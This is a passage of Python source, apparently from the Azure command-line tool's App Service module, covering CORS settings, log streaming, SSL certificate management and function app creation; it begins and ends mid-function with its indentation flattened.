result = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'update_configuration', slot, configs)
return result.cors
def remove_cors(cmd, resource_group_name, name, allowed_origins, slot=None):
configs = get_site_configs(cmd, resource_group_name, name, slot)
if configs.cors:
if allowed_origins:
configs.cors.allowed_origins = [x for x in (configs.cors.allowed_origins or []) if x not in allowed_origins]
else:
configs.cors.allowed_origins = []
configs = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'update_configuration', slot, configs)
return configs.cors
def show_cors(cmd, resource_group_name, name, slot=None):
configs = get_site_configs(cmd, resource_group_name, name, slot)
return configs.cors
def get_streaming_log(cmd, resource_group_name, name, provider=None, slot=None):
scm_url = _get_scm_url(cmd, resource_group_name, name, slot)
streaming_url = scm_url + '/logstream'
if provider:
streaming_url += ('/' + provider.lstrip('/'))
user, password = _get_site_credential(cmd.cli_ctx, resource_group_name, name, slot)
t = threading.Thread(target=_get_log, args=(streaming_url, user, password))
t.daemon = True
t.start()
while True:
time.sleep(100) # so that ctrl+c can stop the command
def download_historical_logs(cmd, resource_group_name, name, log_file=None, slot=None):
scm_url = _get_scm_url(cmd, resource_group_name, name, slot)
url = scm_url.rstrip('/') + '/dump'
user_name, password = _get_site_credential(cmd.cli_ctx, resource_group_name, name, slot)
_get_log(url, user_name, password, log_file)
logger.warning('Downloaded logs to %s', log_file)
def _get_site_credential(cli_ctx, resource_group_name, name, slot=None):
creds = _generic_site_operation(cli_ctx, resource_group_name, name, 'list_publishing_credentials', slot)
creds = creds.result()
return (creds.publishing_user_name, creds.publishing_password)
def _get_log(url, user_name, password, log_file=None):
import certifi
import urllib3
try:
import urllib3.contrib.pyopenssl
urllib3.contrib.pyopenssl.inject_into_urllib3()
except ImportError:
pass
http = urllib3.PoolManager(cert_reqs='CERT_REQUIRED', ca_certs=certifi.where())
headers = urllib3.util.make_headers(basic_auth='{0}:{1}'.format(user_name, password))
r = http.request(
'GET',
url,
headers=headers,
preload_content=False
)
if r.status != 200:
raise CLIError("Failed to connect to '{}' with status code '{}' and reason '{}'".format(
url, r.status, r.reason))
if log_file: # download logs
with open(log_file, 'wb') as f:
while True:
data = r.read(1024)
if not data:
break
f.write(data)
else: # streaming
std_encoding = sys.stdout.encoding
for chunk in r.stream():
if chunk:
# Extra encode() and decode for stdout which does not surpport 'utf-8'
print(chunk.decode(encoding='utf-8', errors='replace')
.encode(std_encoding, errors='replace')
.decode(std_encoding, errors='replace'), end='') # each line of log has CRLF.
r.release_conn()
def upload_ssl_cert(cmd, resource_group_name, name, certificate_password, certificate_file, slot=None):
Certificate = cmd.get_models('Certificate')
client = web_client_factory(cmd.cli_ctx)
webapp = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get', slot)
cert_file = open(certificate_file, 'rb')
cert_contents = cert_file.read()
hosting_environment_profile_param = (webapp.hosting_environment_profile.name
if webapp.hosting_environment_profile else '')
thumb_print = _get_cert(certificate_password, certificate_file)
cert_name = _generate_cert_name(thumb_print, hosting_environment_profile_param,
webapp.location, resource_group_name)
cert = Certificate(password=certificate_password, pfx_blob=cert_contents,
location=webapp.location, server_farm_id=webapp.server_farm_id)
return client.certificates.create_or_update(resource_group_name, cert_name, cert)
def _generate_cert_name(thumb_print, hosting_environment, location, resource_group_name):
return "%s_%s_%s_%s" % (thumb_print, hosting_environment, location, resource_group_name)
def _get_cert(certificate_password, certificate_file):
''' Decrypts the .pfx file '''
p12 = OpenSSL.crypto.load_pkcs12(open(certificate_file, 'rb').read(), certificate_password)
cert = p12.get_certificate()
digest_algorithm = 'sha1'
thumbprint = cert.digest(digest_algorithm).decode("utf-8").replace(':', '')
return thumbprint
def list_ssl_certs(cmd, resource_group_name):
client = web_client_factory(cmd.cli_ctx)
return client.certificates.list_by_resource_group(resource_group_name)
def delete_ssl_cert(cmd, resource_group_name, certificate_thumbprint):
client = web_client_factory(cmd.cli_ctx)
webapp_certs = client.certificates.list_by_resource_group(resource_group_name)
for webapp_cert in webapp_certs:
if webapp_cert.thumbprint == certificate_thumbprint:
return client.certificates.delete(resource_group_name, webapp_cert.name)
raise CLIError("Certificate for thumbprint '{}' not found".format(certificate_thumbprint))
def import_ssl_cert(cmd, resource_group_name, name, key_vault, key_vault_certificate_name):
Certificate = cmd.get_models('Certificate')
client = web_client_factory(cmd.cli_ctx)
webapp = client.web_apps.get(resource_group_name, name)
if not webapp:
raise CLIError("'{}' app doesn't exist in resource group {}".format(name, resource_group_name))
server_farm_id = webapp.server_farm_id
location = webapp.location
kv_id = None
if not is_valid_resource_id(key_vault):
kv_client = get_mgmt_service_client(cmd.cli_ctx, ResourceType.MGMT_KEYVAULT)
key_vaults = kv_client.vaults.list_by_subscription()
for kv in key_vaults:
if key_vault == kv.name:
kv_id = kv.id
break
else:
kv_id = key_vault
if kv_id is None:
kv_msg = 'The Key Vault {0} was not found in the subscription in context. ' \
'If your Key Vault is in a different subscription, please specify the full Resource ID: ' \
'\naz .. ssl import -n {1} -g {2} --key-vault-certificate-name {3} ' \
'--key-vault /subscriptions/[sub id]/resourceGroups/[rg]/providers/Microsoft.KeyVault/' \
'vaults/{0}'.format(key_vault, name, resource_group_name, key_vault_certificate_name)
logger.warning(kv_msg)
return
kv_id_parts = parse_resource_id(kv_id)
kv_name = kv_id_parts['name']
kv_resource_group_name = kv_id_parts['resource_group']
kv_subscription = kv_id_parts['subscription']
cert_name = '{}-{}-{}'.format(resource_group_name, kv_name, key_vault_certificate_name)
lnk = 'https://azure.github.io/AppService/2016/05/24/Deploying-Azure-Web-App-Certificate-through-Key-Vault.html'
lnk_msg = 'Find more details here: {}'.format(lnk)
if not _check_service_principal_permissions(cmd, kv_resource_group_name, kv_name, kv_subscription):
logger.warning('Unable to verify Key Vault permissions.')
logger.warning('You may need to grant Microsoft.Azure.WebSites service principal the Secret:Get permission')
logger.warning(lnk_msg)
kv_cert_def = Certificate(location=location, key_vault_id=kv_id, password='',
key_vault_secret_name=key_vault_certificate_name, server_farm_id=server_farm_id)
return client.certificates.create_or_update(name=cert_name, resource_group_name=resource_group_name,
certificate_envelope=kv_cert_def)
def create_managed_ssl_cert(cmd, resource_group_name, name, hostname, slot=None):
Certificate = cmd.get_models('Certificate')
hostname = hostname.lower()
client = web_client_factory(cmd.cli_ctx)
webapp = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get', slot)
if not webapp:
slot_text = "Deployment slot {} in ".format(slot) if slot else ''
raise CLIError("{0}app {1} doesn't exist in resource group {2}".format(slot_text, name, resource_group_name))
parsed_plan_id = parse_resource_id(webapp.server_farm_id)
plan_info = client.app_service_plans.get(parsed_plan_id['resource_group'], parsed_plan_id['name'])
if plan_info.sku.tier.upper() == 'FREE' or plan_info.sku.tier.upper() == 'SHARED':
raise CLIError('Managed Certificate is not supported on Free and Shared tier.')
if not _verify_hostname_binding(cmd, resource_group_name, name, hostname, slot):
slot_text = " --slot {}".format(slot) if slot else ""
raise CLIError("Hostname (custom domain) '{0}' is not registered with {1}. "
"Use 'az webapp config hostname add --resource-group {2} "
"--webapp-name {1}{3} --hostname {0}' "
"to register the hostname.".format(hostname, name, resource_group_name, slot_text))
server_farm_id = webapp.server_farm_id
location = webapp.location
easy_cert_def = Certificate(location=location, canonical_name=hostname,
server_farm_id=server_farm_id, password='')
return client.certificates.create_or_update(name=hostname, resource_group_name=resource_group_name,
certificate_envelope=easy_cert_def)
def _check_service_principal_permissions(cmd, resource_group_name, key_vault_name, key_vault_subscription):
from azure.cli.command_modules.role._client_factory import _graph_client_factory
from azure.graphrbac.models import GraphErrorException
from azure.cli.core.commands.client_factory import get_subscription_id
subscription = get_subscription_id(cmd.cli_ctx)
# Cannot check if key vault is in another subscription
if subscription != key_vault_subscription:
return False
kv_client = get_mgmt_service_client(cmd.cli_ctx, ResourceType.MGMT_KEYVAULT)
vault = kv_client.vaults.get(resource_group_name=resource_group_name, vault_name=key_vault_name)
# Check for Microsoft.Azure.WebSites app registration
AZURE_PUBLIC_WEBSITES_APP_ID = 'abfa0a7c-a6b6-4736-8310-5855508787cd'
AZURE_GOV_WEBSITES_APP_ID = '6a02c803-dafd-4136-b4c3-5a6f318b4714'
graph_sp_client = _graph_client_factory(cmd.cli_ctx).service_principals
for policy in vault.properties.access_policies:
try:
sp = graph_sp_client.get(policy.object_id)
if sp.app_id == AZURE_PUBLIC_WEBSITES_APP_ID or sp.app_id == AZURE_GOV_WEBSITES_APP_ID:
for perm in policy.permissions.secrets:
if perm == "Get":
return True
except GraphErrorException:
pass # Lookup will fail for non service principals (users, groups, etc.)
return False
def _update_host_name_ssl_state(cmd, resource_group_name, webapp_name, webapp,
host_name, ssl_state, thumbprint, slot=None):
Site, HostNameSslState = cmd.get_models('Site', 'HostNameSslState')
updated_webapp = Site(host_name_ssl_states=[HostNameSslState(name=host_name,
ssl_state=ssl_state,
thumbprint=thumbprint,
to_update=True)],
location=webapp.location, tags=webapp.tags)
return _generic_site_operation(cmd.cli_ctx, resource_group_name, webapp_name, 'create_or_update',
slot, updated_webapp)
def _update_ssl_binding(cmd, resource_group_name, name, certificate_thumbprint, ssl_type, slot=None):
client = web_client_factory(cmd.cli_ctx)
webapp = client.web_apps.get(resource_group_name, name)
if not webapp:
raise CLIError("'{}' app doesn't exist".format(name))
cert_resource_group_name = parse_resource_id(webapp.server_farm_id)['resource_group']
webapp_certs = client.certificates.list_by_resource_group(cert_resource_group_name)
for webapp_cert in webapp_certs:
if webapp_cert.thumbprint == certificate_thumbprint:
if len(webapp_cert.host_names) == 1 and not webapp_cert.host_names[0].startswith('*'):
return _update_host_name_ssl_state(cmd, resource_group_name, name, webapp,
webapp_cert.host_names[0], ssl_type,
certificate_thumbprint, slot)
query_result = list_hostnames(cmd, resource_group_name, name, slot)
hostnames_in_webapp = [x.name.split('/')[-1] for x in query_result]
to_update = _match_host_names_from_cert(webapp_cert.host_names, hostnames_in_webapp)
for h in to_update:
_update_host_name_ssl_state(cmd, resource_group_name, name, webapp,
h, ssl_type, certificate_thumbprint, slot)
return show_webapp(cmd, resource_group_name, name, slot)
raise CLIError("Certificate for thumbprint '{}' not found.".format(certificate_thumbprint))
def bind_ssl_cert(cmd, resource_group_name, name, certificate_thumbprint, ssl_type, slot=None):
SslState = cmd.get_models('SslState')
return _update_ssl_binding(cmd, resource_group_name, name, certificate_thumbprint,
SslState.sni_enabled if ssl_type == 'SNI' else SslState.ip_based_enabled, slot)
def unbind_ssl_cert(cmd, resource_group_name, name, certificate_thumbprint, slot=None):
SslState = cmd.get_models('SslState')
return _update_ssl_binding(cmd, resource_group_name, name,
certificate_thumbprint, SslState.disabled, slot)
def _match_host_names_from_cert(hostnames_from_cert, hostnames_in_webapp):
# the goal is to match '*.foo.com' with host name like 'admin.foo.com', 'logs.foo.com', etc
matched = set()
for hostname in hostnames_from_cert:
if hostname.startswith('*'):
for h in hostnames_in_webapp:
if hostname[hostname.find('.'):] == h[h.find('.'):]:
matched.add(h)
elif hostname in hostnames_in_webapp:
matched.add(hostname)
return matched
# help class handles runtime stack in format like 'node|6.1', 'php|5.5'
class _StackRuntimeHelper:
def __init__(self, cmd, client, linux=False):
self._cmd = cmd
self._client = client
self._linux = linux
self._stacks = []
@staticmethod
def remove_delimiters(runtime):
import re
runtime = re.split('[| :]', runtime) # delimiters allowed: '|', ' ', ':'
return '|'.join(filter(None, runtime))
def resolve(self, display_name):
self._load_stacks_hardcoded()
return next((s for s in self._stacks if s['displayName'].lower() == display_name.lower()),
None)
@property
def stacks(self):
self._load_stacks_hardcoded()
return self._stacks
@staticmethod
def update_site_config(stack, site_config, cmd=None):
for k, v in stack['configs'].items():
setattr(site_config, k, v)
return site_config
@staticmethod
def update_site_appsettings(cmd, stack, site_config):
NameValuePair = cmd.get_models('NameValuePair')
if site_config.app_settings is None:
site_config.app_settings = []
site_config.app_settings += [NameValuePair(name=k, value=v) for k, v in stack['configs'].items()]
return site_config
def _load_stacks_hardcoded(self):
if self._stacks:
return
result = []
if self._linux:
result = get_file_json(RUNTIME_STACKS)['linux']
else: # Windows stacks
result = get_file_json(RUNTIME_STACKS)['windows']
for r in result:
r['setter'] = (_StackRuntimeHelper.update_site_appsettings if 'node' in
r['displayName'] else _StackRuntimeHelper.update_site_config)
self._stacks = result
# Currently using hardcoded values instead of this function. This function calls the stacks API;
# Stacks API is updated with Antares deployments,
# which are infrequent and don't line up with stacks EOL schedule.
def _load_stacks(self):
if self._stacks:
return
os_type = ('Linux' if self._linux else 'Windows')
raw_stacks = self._client.provider.get_available_stacks(os_type_selected=os_type, raw=True)
bytes_value = raw_stacks._get_next().content # pylint: disable=protected-access
json_value = bytes_value.decode('utf8')
json_stacks = json.loads(json_value)
stacks = json_stacks['value']
result = []
if self._linux:
for properties in [(s['properties']) for s in stacks]:
for major in properties['majorVersions']:
default_minor = next((m for m in (major['minorVersions'] or []) if m['isDefault']),
None)
result.append({
'displayName': (default_minor['runtimeVersion']
if default_minor else major['runtimeVersion'])
})
else: # Windows stacks
config_mappings = {
'node': 'WEBSITE_NODE_DEFAULT_VERSION',
'python': 'python_version',
'php': 'php_version',
'aspnet': 'net_framework_version'
}
# get all stack version except 'java'
for stack in stacks:
if stack['name'] not in config_mappings:
continue
name, properties = stack['name'], stack['properties']
for major in properties['majorVersions']:
default_minor = next((m for m in (major['minorVersions'] or []) if m['isDefault']),
None)
result.append({
'displayName': name + '|' + major['displayVersion'],
'configs': {
config_mappings[name]: (default_minor['runtimeVersion']
if default_minor else major['runtimeVersion'])
}
})
# deal with java, which pairs with java container version
java_stack = next((s for s in stacks if s['name'] == 'java'))
java_container_stack = next((s for s in stacks if s['name'] == 'javaContainers'))
for java_version in java_stack['properties']['majorVersions']:
for fx in java_container_stack['properties']['frameworks']:
for fx_version in fx['majorVersions']:
result.append({
'displayName': 'java|{}|{}|{}'.format(java_version['displayVersion'],
fx['display'],
fx_version['displayVersion']),
'configs': {
'java_version': java_version['runtimeVersion'],
'java_container': fx['name'],
'java_container_version': fx_version['runtimeVersion']
}
})
for r in result:
r['setter'] = (_StackRuntimeHelper.update_site_appsettings if 'node' in
r['displayName'] else _StackRuntimeHelper.update_site_config)
self._stacks = result
def get_app_insights_key(cli_ctx, resource_group, name):
appinsights_client = get_mgmt_service_client(cli_ctx, ApplicationInsightsManagementClient)
appinsights = appinsights_client.components.get(resource_group, name)
if appinsights is None or appinsights.instrumentation_key is None:
raise CLIError("App Insights {} under resource group {} was not found.".format(name, resource_group))
return appinsights.instrumentation_key
def create_functionapp_app_service_plan(cmd, resource_group_name, name, is_linux, sku,
number_of_workers=None, max_burst=None, location=None, tags=None):
SkuDescription, AppServicePlan = cmd.get_models('SkuDescription', 'AppServicePlan')
sku = _normalize_sku(sku)
tier = get_sku_name(sku)
if max_burst is not None:
if tier.lower() != "elasticpremium":
raise CLIError("Usage error: --max-burst is only supported for Elastic Premium (EP) plans")
max_burst = validate_range_of_int_flag('--max-burst', max_burst, min_val=0, max_val=20)
if number_of_workers is not None:
number_of_workers = validate_range_of_int_flag('--number-of-workers / --min-elastic-worker-count',
number_of_workers, min_val=0, max_val=20)
client = web_client_factory(cmd.cli_ctx)
if location is None:
location = _get_location_from_resource_group(cmd.cli_ctx, resource_group_name)
sku_def = SkuDescription(tier=tier, name=sku, capacity=number_of_workers)
plan_def = AppServicePlan(location=location, tags=tags, sku=sku_def,
reserved=(is_linux or None), maximum_elastic_worker_count=max_burst,
hyper_v=None, name=name)
return client.app_service_plans.create_or_update(resource_group_name, name, plan_def)
def is_plan_consumption(cmd, plan_info):
SkuDescription, AppServicePlan = cmd.get_models('SkuDescription', 'AppServicePlan')
if isinstance(plan_info, AppServicePlan):
if isinstance(plan_info.sku, SkuDescription):
return plan_info.sku.tier.lower() == 'dynamic'
return False
def is_plan_elastic_premium(cmd, plan_info):
SkuDescription, AppServicePlan = cmd.get_models('SkuDescription', 'AppServicePlan')
if isinstance(plan_info, AppServicePlan):
if isinstance(plan_info.sku, SkuDescription):
return plan_info.sku.tier == 'ElasticPremium'
return False
def validate_and_convert_to_int(flag, val):
try:
return int(val)
except ValueError:
raise CLIError("Usage error: {} is expected to have an int value.".format(flag))
def validate_range_of_int_flag(flag_name, value, min_val, max_val):
value = validate_and_convert_to_int(flag_name, value)
if min_val > value or value > max_val:
raise CLIError("Usage error: {} is expected to be between {} and {} (inclusive)".format(flag_name, min_val,
max_val))
return value
def create_function(cmd, resource_group_name, name, storage_account, plan=None,
os_type=None, functions_version=None, runtime=None, runtime_version=None,
consumption_plan_location=None, app_insights=None, app_insights_key=None,
disable_app_insights=None, deployment_source_url=None,
deployment_source_branch='master', deployment_local_git=None,
docker_registry_server_password=None, docker_registry_server_user=None,
deployment_container_image_name=None, tags=None, assign_identities=None,
role='Contributor', scope=None):
# pylint: disable=too-many-statements, too-many-branches
if functions_version is None:
logger.warning("No functions version specified so defaulting to 2. In the future, specifying a version will "
"be required. To create a 2.x function you would pass in the flag `--functions-version 2`")
functions_version = '2'
if deployment_source_url and deployment_local_git:
raise CLIError('usage error: --deployment-source-url <url> | --deployment-local-git')
if bool(plan) == bool(consumption_plan_location):
raise CLIError("usage error: --plan NAME_OR_ID | --consumption-plan-location LOCATION")
SiteConfig, Site, NameValuePair = cmd.get_models('SiteConfig', 'Site', 'NameValuePair')
docker_registry_server_url = parse_docker_image_name(deployment_container_image_name)
disable_app_insights = (disable_app_insights == "true")
site_config = SiteConfig(app_settings=[])
functionapp_def = Site(location=None, site_config=site_config, tags=tags)
KEYS = FUNCTIONS_STACKS_API_KEYS()
client = web_client_factory(cmd.cli_ctx)
plan_info = None
if runtime is not None:
runtime = runtime.lower()
if consumption_plan_location:
locations = list_consumption_locations(cmd)
location = next((loc for loc in locations if loc['name'].lower() == consumption_plan_location.lower()), None)
if location is None:
raise CLIError("Location is invalid. Use: az functionapp list-consumption-locations")
functionapp_def.location = consumption_plan_location
functionapp_def.kind = 'functionapp'
# if os_type is None, the os type is windows
is_linux = os_type and os_type.lower() == 'linux'
else: # apps with SKU based plan
if is_valid_resource_id(plan):
parse_result = parse_resource_id(plan)
plan_info = client.app_service_plans.get(parse_result['resource_group'], parse_result['name'])
else:
plan_info = client.app_service_plans.get(resource_group_name, plan)
if not plan_info:
raise CLIError("The plan '{}' doesn't exist".format(plan))
location = plan_info.location
is_linux = plan_info.reserved
functionapp_def.server_farm_id = plan
functionapp_def.location = location
if functions_version == '2' and functionapp_def.location in FUNCTIONS_NO_V2_REGIONS:
raise CLIError("2.x functions are not supported in this region. To create a 3.x function, "
"pass in the flag '--functions-version 3'")
if is_linux and not runtime and (consumption_plan_location or not deployment_container_image_name):
raise CLIError(
"usage error: --runtime RUNTIME required for linux functions apps without custom image.")
runtime_stacks_json = _load_runtime_stacks_json_functionapp(is_linux)
if runtime is None and runtime_version is not None:
raise CLIError('Must specify --runtime to use --runtime-version')
# get the matching runtime stack object
runtime_json = _get_matching_runtime_json_functionapp(runtime_stacks_json, runtime if runtime else 'dotnet')
if not runtime_json:
# no matching runtime for os
os_string = "linux" if is_linux else "windows"
supported_runtimes = list(map(lambda x: x[KEYS.NAME], runtime_stacks_json))
raise CLIError("usage error: Currently supported runtimes (--runtime) in {} function apps are: {}."
.format(os_string, ', '.join(supported_runtimes)))
runtime_version_json = _get_matching_runtime_version_json_functionapp(runtime_json,
functions_version,
runtime_version,
is_linux)
if not runtime_version_json:
supported_runtime_versions = list(map(lambda x: x[KEYS.DISPLAY_VERSION],
_get_supported_runtime_versions_functionapp(runtime_json,
functions_version)))
if runtime_version:
if runtime == 'dotnet':
raise CLIError('--runtime-version is not supported for --runtime dotnet. Dotnet version is determined '
'by --functions-version. Dotnet version {} is not supported by Functions version {}.'
.format(runtime_version, functions_version))
raise CLIError('--runtime-version {} is not supported for the selected --runtime {} and '
'--functions-version {}. Supported versions are: {}.'
.format(runtime_version,
runtime,
functions_version,
', '.join(supported_runtime_versions)))
# if runtime_version was not specified, then that runtime is not supported for that functions version
raise CLIError('no supported --runtime-version found for the selected --runtime {} and '
'--functions-version {}'
.format(runtime, functions_version))
if runtime == 'dotnet':
logger.warning('--runtime-version is not supported for --runtime dotnet. Dotnet version is determined by '
'--functions-version. Dotnet version will be %s for this function app.',
runtime_version_json[KEYS.DISPLAY_VERSION])
if runtime_version_json[KEYS.IS_DEPRECATED]:
logger.warning('%s version %s has been deprecated. In the future, this version will be unavailable. '
'Please update your command to use a more recent version. For a list of supported '
'--runtime-versions, run \"az functionapp create -h\"',
runtime_json[KEYS.PROPERTIES][KEYS.DISPLAY], runtime_version_json[KEYS.DISPLAY_VERSION])
site_config_json = runtime_version_json[KEYS.SITE_CONFIG_DICT]
app_settings_json = runtime_version_json[KEYS.APP_SETTINGS_DICT]
con_string = _validate_and_get_connection_string(cmd.cli_ctx, resource_group_name, storage_account)
if is_linux:
functionapp_def.kind = 'functionapp,linux'
functionapp_def.reserved = True
is_consumption = consumption_plan_location is not None
if not is_consumption:
site_config.app_settings.append(NameValuePair(name='MACHINEKEY_DecryptionKey',
value=str(hexlify(urandom(32)).decode()).upper()))
if deployment_container_image_name:
functionapp_def.kind = 'functionapp,linux,container'
site_config.app_settings.append(NameValuePair(name='DOCKER_CUSTOM_IMAGE_NAME',
value=deployment_container_image_name))
site_config.app_settings.append(NameValuePair(name='FUNCTION_APP_EDIT_MODE', value='readOnly'))
site_config.app_settings.append(NameValuePair(name='WEBSITES_ENABLE_APP_SERVICE_STORAGE',
value='false'))
site_config.linux_fx_version = _format_fx_version(deployment_container_image_name)
# clear all runtime specific configs and settings
site_config_json = {KEYS.USE_32_BIT_WORKER_PROC: False}
app_settings_json = {}
# ensure that app insights is created if not disabled
runtime_version_json[KEYS.APPLICATION_INSIGHTS] = True
else:
site_config.app_settings.append(NameValuePair(name='WEBSITES_ENABLE_APP_SERVICE_STORAGE',
value='true'))
else:
functionapp_def.kind = 'functionapp'
# set site configs
for prop, value in site_config_json.items():
snake_case_prop = _convert_camel_to_snake_case(prop)
setattr(site_config, snake_case_prop, value)
# adding app settings
for app_setting, value in app_settings_json.items():
site_config.app_settings.append(NameValuePair(name=app_setting, value=value))
site_config.app_settings.append(NameValuePair(name='FUNCTIONS_EXTENSION_VERSION',
value=_get_extension_version_functionapp(functions_version)))
site_config.app_settings.append(NameValuePair(name='AzureWebJobsStorage', value=con_string))
# If plan is not consumption or elastic premium, we need to set always on
if consumption_plan_location is None and not is_plan_elastic_premium(cmd, plan_info):
site_config.always_on = True
# If plan is elastic premium or windows consumption, we need these app settings
is_windows_consumption = consumption_plan_location is not None and not is_linux
if is_plan_elastic_premium(cmd, plan_info) or is_windows_consumption:
site_config.app_settings.append(NameValuePair(name='WEBSITE_CONTENTAZUREFILECONNECTIONSTRING',
value=con_string))
site_config.app_settings.append(NameValuePair(name='WEBSITE_CONTENTSHARE', value=name.lower()))
create_app_insights = False
if app_insights_key is not None:
site_config.app_settings.append(NameValuePair(name='APPINSIGHTS_INSTRUMENTATIONKEY',
value=app_insights_key))
elif app_insights is not None:
instrumentation_key = get_app_insights_key(cmd.cli_ctx, resource_group_name, app_insights)
site_config.app_settings.append(NameValuePair(name='APPINSIGHTS_INSTRUMENTATIONKEY',
value=instrumentation_key))
elif disable_app_insights or not runtime_version_json[KEYS.APPLICATION_INSIGHTS]:
# set up dashboard if no app insights
site_config.app_settings.append(NameValuePair(name='AzureWebJobsDashboard', value=con_string))
elif not disable_app_insights and runtime_version_json[KEYS.APPLICATION_INSIGHTS]:
create_app_insights = True
poller = client.web_apps.create_or_update(resource_group_name, name, functionapp_def)
functionapp = LongRunningOperation(cmd.cli_ctx)(poller)
if consumption_plan_location and is_linux:
logger.warning("Your Linux function app '%s', that uses a consumption plan has been successfully "
"created but is not active until content is published using "
"Azure Portal or the Functions Core Tools.", name)
else:
_set_remote_or_local_git(cmd, functionapp, resource_group_name, name, deployment_source_url,
deployment_source_branch, deployment_local_git)
if create_app_insights:
try:
try_create_application_insights(cmd, functionapp)
except Exception: # pylint: disable=broad-except
logger.warning('Error while trying to create and configure an Application Insights for the Function App. '
'Please use the Azure Portal to create and configure the Application Insights, if needed.')
update_app_settings(cmd, functionapp.resource_group, functionapp.name,
['AzureWebJobsDashboard={}'.format(con_string)])
if deployment_container_image_name:
update_container_settings_functionapp(cmd, resource_group_name, name, docker_registry_server_url,
deployment_container_image_name, docker_registry_server_user,
docker_registry_server_password)
if assign_identities is not None:
identity = assign_identity(cmd, resource_group_name, name, assign_identities,
role, None, scope)
functionapp.identity = identity
return functionapp
def _load_runtime_stacks_json_functionapp(is_linux):
KEYS = FUNCTIONS_STACKS_API_KEYS()
if is_linux:
return get_file_json(FUNCTIONS_STACKS_API_JSON_PATHS['linux'])[KEYS.VALUE]
return get_file_json(FUNCTIONS_STACKS_API_JSON_PATHS['windows'])[KEYS.VALUE]
def _get_matching_runtime_json_functionapp(stacks_json, runtime):
KEYS = FUNCTIONS_STACKS_API_KEYS()
matching_runtime_json = list(filter(lambda x: x[KEYS.NAME] == runtime, stacks_json))
if matching_runtime_json:
return matching_runtime_json[0]
return None
def _get_supported_runtime_versions_functionapp(runtime_json, functions_version):
KEYS = FUNCTIONS_STACKS_API_KEYS()
extension_version = _get_extension_version_functionapp(functions_version)
supported_versions_list = []
for runtime_version_json in runtime_json[KEYS.PROPERTIES][KEYS.MAJOR_VERSIONS]:
if extension_version in runtime_version_json[KEYS.SUPPORTED_EXTENSION_VERSIONS]:
supported_versions_list.append(runtime_version_json)
return supported_versions_list
def _get_matching_runtime_version_json_functionapp(runtime_json, functions_version, runtime_version, is_linux):
KEYS = FUNCTIONS_STACKS_API_KEYS()
extension_version = _get_extension_version_functionapp(functions_version)
if runtime_version:
for runtime_version_json in runtime_json[KEYS.PROPERTIES][KEYS.MAJOR_VERSIONS]:
if (runtime_version_json[KEYS.DISPLAY_VERSION] == runtime_version and
extension_version in runtime_version_json[KEYS.SUPPORTED_EXTENSION_VERSIONS]):
return runtime_version_json
return None
# find the matching default runtime version
supported_versions_list = _get_supported_runtime_versions_functionapp(runtime_json, functions_version)
default_version_json = {}
default_version = 0.0
for current_runtime_version_json in supported_versions_list:
if current_runtime_version_json[KEYS.IS_DEFAULT]:
current_version = _get_runtime_version_functionapp(current_runtime_version_json[KEYS.RUNTIME_VERSION],
is_linux)
if not default_version_json or default_version < current_version:
default_version_json = current_runtime_version_json
default_version = current_version
return default_version_json
def _get_extension_version_functionapp(functions_version):
if functions_version is not None:
return '~{}'.format(functions_version)
return '~2'
def _get_app_setting_set_functionapp(site_config, app_setting):
return list(filter(lambda x: x.name == app_setting, site_config.app_settings))
def _convert_camel_to_snake_case(text):
return reduce(lambda x, y: x + ('_' if y.isupper() else '') + y, text).lower()
def _get_runtime_version_functionapp(version_string, is_linux):
import re
windows_match = re.fullmatch(FUNCTIONS_WINDOWS_RUNTIME_VERSION_REGEX, version_string)
if windows_match:
return float(windows_match.group(1))
linux_match = re.fullmatch(FUNCTIONS_LINUX_RUNTIME_VERSION_REGEX, version_string)
if linux_match:
return float(linux_match.group(1))
try:
return float(version_string)
except ValueError:
return 0
def try_create_application_insights(cmd, functionapp):
creation_failed_warn = 'Unable to create the Application Insights for the Function App. ' \
'Please use the Azure Portal to manually create and configure the Application Insights, ' \
'if needed.'
ai_resource_group_name = functionapp.resource_group
ai_name = functionapp.name
ai_location = functionapp.location
app_insights_client = get_mgmt_service_client(cmd.cli_ctx, ApplicationInsightsManagementClient)
ai_properties = {
"name": ai_name,
"location": ai_location,
"kind": "web",
"properties": {
"Application_Type": "web"
}
}
appinsights = app_insights_client.components.create_or_update(ai_resource_group_name, ai_name, ai_properties)
if appinsights is None or appinsights.instrumentation_key is None:
logger.warning(creation_failed_warn)
return
# We make this success message as a warning to no interfere with regular JSON output in stdout
logger.warning('Application Insights \"%s\" was created for this Function App. '
'You can visit https://portal.azure.com/#resource%s/overview to view your '
'Application Insights component', appinsights.name, appinsights.id)
update_app_settings(cmd, functionapp.resource_group, functionapp.name,
['APPINSIGHTS_INSTRUMENTATIONKEY={}'.format(appinsights.instrumentation_key)])
def _set_remote_or_local_git(cmd, webapp, resource_group_name, name, deployment_source_url=None,
deployment_source_branch='master', deployment_local_git=None):
if deployment_source_url:
logger.warning("Linking to git repository '%s'", deployment_source_url)
try:
config_source_control(cmd, resource_group_name, name, deployment_source_url, 'git',
deployment_source_branch, manual_integration=True)
except Exception as ex: # pylint: disable=broad-except
ex = ex_handler_factory(no_throw=True)(ex)
logger.warning("Link to git repository failed due to error '%s'", ex)
if deployment_local_git:
local_git_info = enable_local_git(cmd, resource_group_name, name)
logger.warning("Local git is configured with url of '%s'", local_git_info['url'])
setattr(webapp, 'deploymentLocalGitUrl', local_git_info['url'])
def _validate_and_get_connection_string(cli_ctx, resource_group_name, storage_account):
sa_resource_group = resource_group_name
if is_valid_resource_id(storage_account):
sa_resource_group = parse_resource_id(storage_account)['resource_group']
storage_account = parse_resource_id(storage_account)['name']
storage_client = get_mgmt_service_client(cli_ctx, StorageManagementClient)
storage_properties = storage_client.storage_accounts.get_properties(sa_resource_group,
storage_account)
error_message = ''
endpoints = storage_properties.primary_endpoints
sku = storage_properties.sku.name
allowed_storage_types = ['Standard_GRS', 'Standard_RAGRS', 'Standard_LRS', 'Standard_ZRS', 'Premium_LRS']
for e in ['blob', 'queue', 'table']:
if not getattr(endpoints, e, None):
error_message = "Storage account '{}' has no '{}' endpoint. It must have table, queue, and blob endpoints all enabled".format(storage_account, e) # pylint: disable=line-too-long
if sku not in allowed_storage_types:
error_message += 'Storage type {} is not allowed'.format(sku)
if error_message:
raise CLIError(error_message)
obj = storage_client.storage_accounts.list_keys(sa_resource_group, storage_account) # pylint: disable=no-member
try:
keys = [obj.keys[0].value, obj.keys[1].value] # pylint: disable=no-member
